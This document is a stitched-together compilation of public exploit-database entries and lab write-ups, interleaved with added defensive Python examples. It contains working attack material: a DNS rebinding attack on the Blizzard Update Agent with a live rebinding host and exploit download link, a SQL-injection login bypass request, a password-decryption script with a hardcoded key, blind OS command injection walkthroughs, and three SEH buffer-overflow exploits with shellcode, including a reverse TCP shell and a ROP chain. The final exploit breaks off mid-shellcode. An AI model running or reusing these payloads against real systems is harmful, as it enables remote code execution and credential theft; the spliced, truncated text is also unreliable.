All Blizzard games are installed alongside a shared tool called "Blizzard Update Agent"; investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed.
The agent utility creates a JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance-related options. Blizzard use a custom authentication scheme to verify the RPCs are from a legitimate source; it looks like this:
$ curl -si http://localhost:1120/agent
HTTP/1.0 200 OK
Content-Length: 359
{
"pid" : 3140.000000,
"user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
"user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
"state" : 1004.000000,
"version" : "2.13.4.5955",
"region" : "us",
"type" : "retail",
"opt_in_feedback" : true,
"session" : "15409717072196133548",
"authorization" : "11A87920224BD1FB22AF5F868CA0E789"
}
This endpoint is permitted without authentication, but all other requests must have a valid "Authorization" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is they will be ignored because requests must prove they can read and write the authorization property.
I don't think this design will work because of an attack called "DNS rebinding". Any website can simply create a DNS name that they are authorized to communicate with, and then make it resolve to localhost.
To be clear, this means that *any* website can send privileged commands to the agent.
I have a domain I use for testing called rbndr.us; you can use this page to generate hostnames:
https://lock.cmpxchg8b.com/rebinder.html
Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 199.241.29.227
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up).
I just wait for the cached response to expire, and then POST commands to the server.
Exploitation would involve using network drives, or setting destination to "Downloads" and making the browser install dlls, datafiles, etc.
I made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea!
http://lock.cmpxchg8b.com/yah4od7N.html
See screenshot attached of how it's supposed to look.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43665.zip
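The standard defence against the rebinding attack described above is to check the Host header before anything else: a browser always sends the hostname from the URL (here the attacker's rbndr.us name) in Host, and its page origin in Origin, so a daemon bound to loopback can refuse every request that was not addressed to localhost. The following is an added example, not Blizzard's code or part of the original report; the port 1120 and the rbndr.us hostname come from the report, and the trusted-origin list is a placeholder.

```python
# Added example: Host/Origin gate for a localhost RPC daemon (not the agent's own code).

LISTEN_PORT = 1120
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}


def split_host_port(value):
    """Split a Host header into (host, port). port is None when absent;
    (None, None) signals a malformed value, which callers treat as untrusted."""
    value = value.strip().lower()
    if value.startswith("["):                      # bracketed IPv6 literal, e.g. [::1]:1120
        end = value.find("]")
        if end == -1:
            return None, None
        host, rest = value[:end + 1], value[end + 1:]
        if rest == "":
            return host, None
        if not rest.startswith(":"):
            return None, None
        port_text = rest[1:]
    else:
        host, sep, port_text = value.partition(":")
        if sep == "":
            return host, None
    if not port_text.isdigit():
        return None, None
    return host, int(port_text)


def host_header_is_local(host_header, listen_port=LISTEN_PORT):
    """True only if the request was addressed to this daemon by a loopback name."""
    if host_header is None:
        return False
    host, port = split_host_port(host_header)
    return host in ALLOWED_HOSTS and port in (None, listen_port)


def origin_is_trusted(origin_header, trusted_origins):
    """Browser requests carry Origin; anything not explicitly trusted is refused.
    Non-browser clients such as curl send no Origin and are left to the Host check."""
    if origin_header is None:
        return True
    return origin_header.strip().lower() in trusted_origins


def should_accept(headers, trusted_origins=frozenset()):
    """Combined gate, to run before the Authorization token is even looked at."""
    return (host_header_is_local(headers.get("Host"))
            and origin_is_trusted(headers.get("Origin"), trusted_origins))


# Constructed requests: the curl call from the report, and a browser request that
# arrived through the rebound hostname after its DNS answer flipped to 127.0.0.1.
LOCAL_CURL = {"Host": "localhost:1120"}
REBOUND_BROWSER = {"Host": "7f000001.c7f11de3.rbndr.us:1120",
                   "Origin": "http://7f000001.c7f11de3.rbndr.us"}

if __name__ == "__main__":
    print("curl from localhost accepted:", should_accept(LOCAL_CURL))
    print("rebound browser request accepted:", should_accept(REBOUND_BROWSER))
```

The rebound request fails on both counts: its Host header names the attacker's domain rather than localhost, and its Origin is not on the trusted list. Because the check uses only what the browser itself attaches, it holds no matter which IP address the name currently resolves to.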
# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi
# Date: 13 April 2021
# Exploit Author: sigeri94
# Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/
# Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master
# Version: 1.0
POST /travel/Admin/ HTTP/1.1
Host: 192.168.186.132
Content-Length: 49
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.132/travel/Admin/
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312
Connection: close
username=admin%27+%23&password=admin&Login=Log+in
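The request above sends the username `admin' #`, which closes the string literal and comments out the rest of the WHERE clause, so the password comparison never runs. The following is an added example, not the application's code or part of the advisory: it reproduces the vulnerable string-built query next to a parameterized version with hashed password storage. The original app is PHP/MySQL, where `#` begins a comment; this stand-alone demo uses sqlite3, whose line-comment token is `--`, so the equivalent bypass string here is `admin' --`. The account and password are constructed sample data.

```python
# Added example: string-built login query vs. parameterized lookup (sqlite3 stand-in).
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 200_000


def setup_db():
    conn = sqlite3.connect(":memory:")
    # vulnerable table mirrors the app: plaintext password compared inside SQL
    conn.execute("CREATE TABLE admin (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (?, ?)", ("admin", "constructed-pass"))
    # fixed table: random per-user salt and a PBKDF2 hash, verified in code
    conn.execute("CREATE TABLE admin_fixed (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"constructed-pass", salt, PBKDF2_ROUNDS)
    conn.execute("INSERT INTO admin_fixed VALUES (?, ?, ?)", ("admin", salt, pw_hash))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The advisory's pattern: user input spliced straight into SQL syntax."""
    query = ("SELECT username FROM admin WHERE username='%s' AND password='%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_fixed(conn, username, password):
    """Parameterized lookup (input can never become syntax) plus constant-time
    comparison of the derived hash; the password is never part of the query."""
    row = conn.execute("SELECT salt, pw_hash FROM admin_fixed WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, stored)


BYPASS_USERNAME = "admin' --"   # sqlite3 spelling of the advisory's admin' #

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable login with bypass string:", login_vulnerable(db, BYPASS_USERNAME, "wrong"))
    print("fixed login with bypass string:     ", login_fixed(db, BYPASS_USERNAME, "wrong"))
    print("fixed login with real password:     ", login_fixed(db, "admin", "constructed-pass"))
```

With the bypass string the vulnerable query becomes `... WHERE username='admin' --' AND password='wrong'`, so the row for `admin` matches on the username alone. In the fixed version the same string is just a username that does not exist, and the lookup returns no row.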
// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption
// Date: 2022-08-12
// Exploit Author: p1ckzi
// Vendor Homepage: https://thingm.com/
// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7
// Vulnerable Version: blink1control2 <= 2.2.7
// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.
// CVE: CVE-2022-35513
//
// Description:
// the blink1control2 app (versions <= 2.2.7) utilises an insecure method
// of password storage which can be found by accessing the /blink1/input url
// of the api server.
// password ciphertext for skype logins and email are listed
// and can be decrypted. example usage:
// node blink1-pass-decrypt <ciphertext>
#!/usr/bin/env node
const {ArgumentParser} = require('argparse');
const simpleCrypt = require('simplecrypt');
function exploit() {
const BANNER = '\033[36m\n\
_ _ _ _ _\n\
| |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\
| \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\
| |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\
|_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\
|_|\n\
_ _\n\
__| | ___ ___ _ __ _ _ _ __ | |_\n\
/ _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\
| (_| | __| (__| | | |_| | |_) | |_\n\
\\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\
|___/|_|\033[39m';
const PARSER = new ArgumentParser({
description: 'decrypts passwords found at the /blink/input url '
+ 'of the blink1control2 api server (version <= 2.2.7 ).'
});
PARSER.add_argument('ciphertext', {
help: 'encrypted password string to use', type: 'str'
});
let args = PARSER.parse_args();
// supplied ciphertext is decrypted with same salt, password, and method
// used for encryption:
try {
let crypt = simpleCrypt({
salt: 'boopdeeboop',
password: 'blink1control',
method: 'aes-192-ecb'
});
let ciphertext = args.ciphertext;
let decrypted = crypt.decrypt(ciphertext);
console.log(BANNER);
console.log('\033[32m[+] decrypted password:\033[39m');
console.log(decrypted);
}
catch (err) {
// simplecrypt throws (typically a TypeError on malformed hex) when the input is not valid ciphertext
console.log('\033[33m[!] the submitted hash was invalid.\033[39m');
process.exit(1);
}
}
exploit()
In this post we will be solving the PortSwigger lab "Blind OS command injection with time delays".

To solve the lab, we have to cause a 10-second delay in the server's response time. To do so, we will use the OS command injection found in the feedback function.
So we go to the "Submit feedback" button:

As we can see, there are a few fields to fill in. So let's fill them in:

Now, before sending the feedback, we set up Burp Suite to receive the requests:

With that ready, we send the feedback to capture the request:

This is the request sent to the server when feedback is submitted. To work with it, we send it to Repeater by pressing Ctrl+R:

Once in Repeater, we can see that a valid request simply gets a 200 status response and not much else.
However, among all the parameters being sent, let's try to see whether we can execute a command in any of them:

In the message field, we can escape out into a command so that it executes, causing a 10-second response delay on the server, which is what the task asked for.
This way, we solve the lab:

In this post we will be solving the PortSwigger lab "Blind OS command injection with output redirection".

To solve the lab, we have to execute the whoami command on the server and read its output. To do so, we will use a blind OS command injection found in the feedback function.

As we can see, there are a few fields to fill in. So let's fill them in:

Now, before sending the feedback, we set up Burp Suite to receive the requests:

With that ready, we send the feedback to capture the request:

This is the request sent to the server when feedback is submitted. To work with it, we send it to Repeater by pressing Ctrl+R:

Once in Repeater, we can see that a valid request simply gets a 200 status response and not much else.
However, among all the parameters being sent, let's try to see whether we can execute a command in any of them, and not only that, but also redirect its output to a directory we can access, so that we can read the output of the command we executed.
The first thing is to determine which directory we can redirect the command output to. In this case, we will use the directory where images are stored, which the lab description tells us is:
- /var/www/images
Knowing this, let's try a blind OS command injection that redirects the command output to a file in the directory above:

Since this is a blind OS command injection, we cannot see the output in the server's response. To confirm whether it worked, we will have to access the file to which we redirected the command output.
To access the file in question, since we put it in a folder called "images", we can assume it may have been saved to the same path as, for example, the product cover images on the site:

Images are accessed through the filename parameter of the image file, so we will replace the value of this parameter with the name of the file to which we redirected the command output, in this case whoami.txt:

This way, we manage to solve the lab:

In this post we will be solving the PortSwigger lab "Blind OS command injection with out-of-band interaction".

To solve the lab we have to cause a DNS lookup to Burp Suite's public server (burpcollaborator.net). To do so, we will use a blind OS command injection found in the feedback function.

As we can see, there are a few fields to fill in. So let's fill them in:

Now, before sending the feedback, we set up Burp Suite to receive the requests:

With that ready, we send the feedback to capture the request:

This is the request sent to the server when feedback is submitted. To work with it, we send it to Repeater by pressing Ctrl+R:

Once in Repeater, we can see that a valid request simply gets a 200 status response and not much else.
However, among all the parameters being sent, let's try to see whether we can execute a command in any of them and, with it, perform a DNS lookup to the Burp Suite server:

After making this request, if we refresh the site, we will see that we have solved the challenge:

In this case, it is true that the best way to do the "out-of-band" style challenges is to have Burp Suite Pro in order to use the Burp Collaborator client feature:

In fact, the next and last OS command injection challenge (at least as of January 2021) cannot be solved without Burp Suite Pro 😥.
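All three labs above exploit the same root cause: a feedback handler that hands user-supplied fields to a shell. The following is an added example, not PortSwigger's lab code or part of these write-ups. It shows the handler hardened in two layers (input validation, then an argv list with no shell, so metacharacters arrive as literal bytes) and detection logic for the three payload shapes the labs use (time delay, redirection into /var/www/images, out-of-band lookup of burpcollaborator.net). The handler, the sample POST bodies and the mail stand-in are constructed for this demo; the only program it actually runs is the Python interpreter itself, in place of the mail tool.

```python
# Added example: hardened feedback handler plus detection over feedback POST bodies.
import re
import subprocess
import sys
from urllib.parse import parse_qs

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def invoke_mailer(email):
    """Stand-in for `mail ... <email>`: argv list, no shell, so the address is a single
    literal argument whatever characters it contains. Swap in the real argv in production."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", email]
    result = subprocess.run(argv, capture_output=True, text=True, check=True, timeout=5)
    return result.stdout.rstrip("\n")


def send_feedback(name, email, message):
    """Validation layer in front of the no-shell invocation. `name` and `message`
    are length-checked here but not used by the stand-in mailer."""
    if not EMAIL_RE.match(email):
        raise ValueError("rejected email address")
    if not (0 < len(name) <= 100 and 0 < len(message) <= 2000):
        raise ValueError("rejected field length")
    return invoke_mailer(email)


# Detection: one signature per lab variant, applied to each decoded form field.
INJECTION_PATTERNS = {
    "time-delay": re.compile(r"[;&|`]\s*(sleep|ping)\b", re.I),
    "output-redirect": re.compile(r">\s*/var/www/images/", re.I),
    "out-of-band": re.compile(r"\b(nslookup|dig|curl|wget)\b.*burpcollaborator\.net", re.I),
}


def classify_feedback_body(raw_body):
    """Return the set of lab-style injection signatures present in a feedback POST body."""
    fields = parse_qs(raw_body, keep_blank_values=True)
    hits = set()
    for values in fields.values():
        for value in values:
            for label, pattern in INJECTION_PATTERNS.items():
                if pattern.search(value):
                    hits.add(label)
    return hits


# Constructed request bodies: one benign, one per lab variant (URL-encoded as sent).
SAMPLE_BODIES = {
    "benign": "csrf=abc&name=Ana&email=ana%40example.com&subject=hi&message=Nice+shop",
    "delay": "csrf=abc&name=Ana&email=ana%40example.com%7C%7Cping+-c+10+127.0.0.1%7C%7C&subject=hi&message=x",
    "redir": "csrf=abc&name=Ana&email=%7C%7Cwhoami%3E%2Fvar%2Fwww%2Fimages%2Fwhoami.txt%7C%7C&subject=hi&message=x",
    "oob": "csrf=abc&name=Ana&email=%7C%7Cnslookup+x.burpcollaborator.net%7C%7C&subject=hi&message=x",
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(f"{label:7s} -> {sorted(classify_feedback_body(body)) or 'clean'}")
    print("no-shell invocation echoes the literal address:", invoke_mailer("a@b.com; sleep 10"))
```

Note how `invoke_mailer` remains safe even for an address that slips past validation: without a shell there is nothing to interpret `;`, `||` or `>`, which is why the argv form, not the regex, is the primary control. The detection patterns are deliberately narrow to the lab payloads; a production rule set would decode nested encodings and cover more command names.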
source: https://www.securityfocus.com/bid/58624/info
BlazeVideo HDTV Player Standard is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
BlazeVideo HDTV Player Standard 6.6.0.2 is vulnerable; other versions may also be affected.
# Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow
# Date: 19-03-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.blazevideo.com/hdtv-player/
# Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std
# Version: BlazeVideo HDTV Player Standard 6.6.0.2
# Tested on: Windows 7 German
filename="poc.PLF"
junk = "http://"+ "\x41" * 601
nseh = "\xEB\x06\x90\x90"
seh = "\x5F\x17\x60\x61" #6160175F \EPG.dll
nops = "\x90" * 20
#windows/exec CMD=calc.exe bad \x00\x0a\x1a
shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x33\x31\x42\x12\x83\xea\xfc\x03\xed\x82\xe5\x61\x0d\x72\x60"
"\x89\xed\x83\x13\x03\x08\xb2\x01\x77\x59\xe7\x95\xf3\x0f\x04"
"\x5d\x51\xbb\x9f\x13\x7e\xcc\x28\x99\x58\xe3\xa9\x2f\x65\xaf"
"\x6a\x31\x19\xad\xbe\x91\x20\x7e\xb3\xd0\x65\x62\x3c\x80\x3e"
"\xe9\xef\x35\x4a\xaf\x33\x37\x9c\xa4\x0c\x4f\x99\x7a\xf8\xe5"
"\xa0\xaa\x51\x71\xea\x52\xd9\xdd\xcb\x63\x0e\x3e\x37\x2a\x3b"
"\xf5\xc3\xad\xed\xc7\x2c\x9c\xd1\x84\x12\x11\xdc\xd5\x53\x95"
"\x3f\xa0\xaf\xe6\xc2\xb3\x6b\x95\x18\x31\x6e\x3d\xea\xe1\x4a"
"\xbc\x3f\x77\x18\xb2\xf4\xf3\x46\xd6\x0b\xd7\xfc\xe2\x80\xd6"
"\xd2\x63\xd2\xfc\xf6\x28\x80\x9d\xaf\x94\x67\xa1\xb0\x70\xd7"
"\x07\xba\x92\x0c\x31\xe1\xf8\xd3\xb3\x9f\x45\xd3\xcb\x9f\xe5"
"\xbc\xfa\x14\x6a\xba\x02\xff\xcf\x34\x49\xa2\x79\xdd\x14\x36"
"\x38\x80\xa6\xec\x7e\xbd\x24\x05\xfe\x3a\x34\x6c\xfb\x07\xf2"
"\x9c\x71\x17\x97\xa2\x26\x18\xb2\xc0\xa9\x8a\x5e\x29\x4c\x2b"
"\xc4\x35")
f = open(filename,"wb")
f.write(junk+nseh+seh+nops+shellcode)
f.close()
print("Finish")
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86
#!/usr/bin/python
file = "exploit.plf"
offset ="A"*(612-4)
nseh = "\xeb\x1e\x90\x90"
seh = "\x34\x31\x02\x64"
nops = "\x90" * 24
# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"
buffer = offset + nseh + seh + nops + shellcode
f = open(file,'w')
f.write(buffer)
f.close()
## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic
# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'
## Change shellcode according to your needs
## Shellcode max size is around 700 bytes.
# bad chars:
# \x00, \x0a, \x0b, \x1a
import struct
bfile = open('bfile.plf','w')
buf = 'A'*84
buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret
buf += 'AAAA' # ret 04 ting from sehandler
buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c
buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret
buf += 'A'*500
buf += 'BBBB' # nseh
buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04
#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA'
# esp lands here.
#setting up the dynamic pointer for virtual protect
buf += struct.pack('<L', 0x61640e32) # pop eax; retn.
buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32
buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c
buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax]
# now eax has the kernel32.dll pointer
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04
buf += struct.pack('<L', 0x61640e32) # pop eax ret
buf += 'XXXX' # ret 4 padding
buf += struct.pack('<L', 0xffff675d) # neg to 98a3
buf += struct.pack('<L', 0x603267d4) # neg eax; ret
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret
buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret
buf += 'XXXX' # pop esi padding
buf += struct.pack('<L', 0x641045f4) # sub eax,ecx
# now eax has the pointer to VirtualProtect
#------------------------------------------------------------------------
# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
# SETTING ESI
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4
# SETTING EBP
buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret
buf += 'XXXX' # prev ret 4 padding
buf += struct.pack('<L', 0x60349b63) # jmp esp
# SETTING EBX
buf += struct.pack('<L', 0x61629938) # pop eax; ret
buf += struct.pack('<L', 0xfffffdff) # neg to 0x201
buf += struct.pack('<L', 0x6033b16b) # neg eax; ret
buf += struct.pack('<L', 0x61640124) # xchg eax,ebx
# SETTING EDX
buf += struct.pack('<L', 0x616310e8) # pop eax; ret
buf += struct.pack('<L', 0xffffffc0) # neg of 0x40
buf += struct.pack('<L', 0x6033b16b) # neg eax; retn
buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx
# SETTING ECX
buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret
buf += struct.pack('<L', 0x1001524e) # writable location
# SETTING EDI
buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret
buf += struct.pack('<L', 0x6162e802) # retn (rop nop)
# SETTING EAX
buf += struct.pack('<L', 0x6162d638) # pop eax; retn
buf += struct.pack('<L', 0x90909090) # nop
# FINALLY PUSHAD
buf += struct.pack('<L', 0x6033cd4a) # push ad
buf += '\x90\x90\x90\x90'*4
# shellcode generated using:
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
# -b '\x00\x0a\x0b\x1a'
buf += (
"\xbb\x42\xa8\xb5\x43\xda\xc7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x41\x83\xc2\x04\x31\x5a\x0f\x03\x5a\x4d\x4a\x40\x9a\xba\x11"
"\x72\x69\x18\xd2\xb4\x40\xd2\x6d\x86\xad\x76\x19\x99\x1d\xfd"
"\x6b\x56\xd5\x77\x88\xed\xaf\x7f\x3b\x8f\x0f\xf4\x0d\x48\x1f"
"\x12\x07\x5b\xc6\x23\x36\x64\x18\x43\x33\xf7\xff\xa7\xc8\x4d"
"\x3c\x2c\x9a\x65\x44\x33\xc9\xfd\xfe\x2b\x86\x58\xdf\x4a\x73"
"\xbf\x2b\x05\x08\x74\xdf\x94\xe0\x44\x20\xa7\x3c\x5a\x72\x43"
"\x7c\xd7\x8c\x8a\xb2\x15\x92\xcb\xa6\xd2\xaf\xaf\x1c\x33\xa5"
"\xae\xd6\x19\x61\x31\x02\xfb\xe2\x3d\x9f\x8f\xaf\x21\x1e\x7b"
"\xc4\x5d\xab\x7a\x33\xd4\xef\x58\xdf\x87\x2c\x12\xd7\x6e\x67"
"\xda\x0d\xf9\x45\xb5\x43\xb7\x47\xaa\x0e\xaf\xc7\xcd\x50\xd0"
"\x71\x74\xab\x95\xfc\xaf\x51\x9a\x87\x4c\xb2\x0e\x60\xe2\x45"
"\x51\x8f\x72\xfc\xa5\x18\xe9\x93\x95\x99\x99\x58\xe7\x37\x3e"
"\xf7\x72\x3b\xdb\x75\x4c\x60\xab\x26\x88\x9c\x25\x30\x86\x5f"
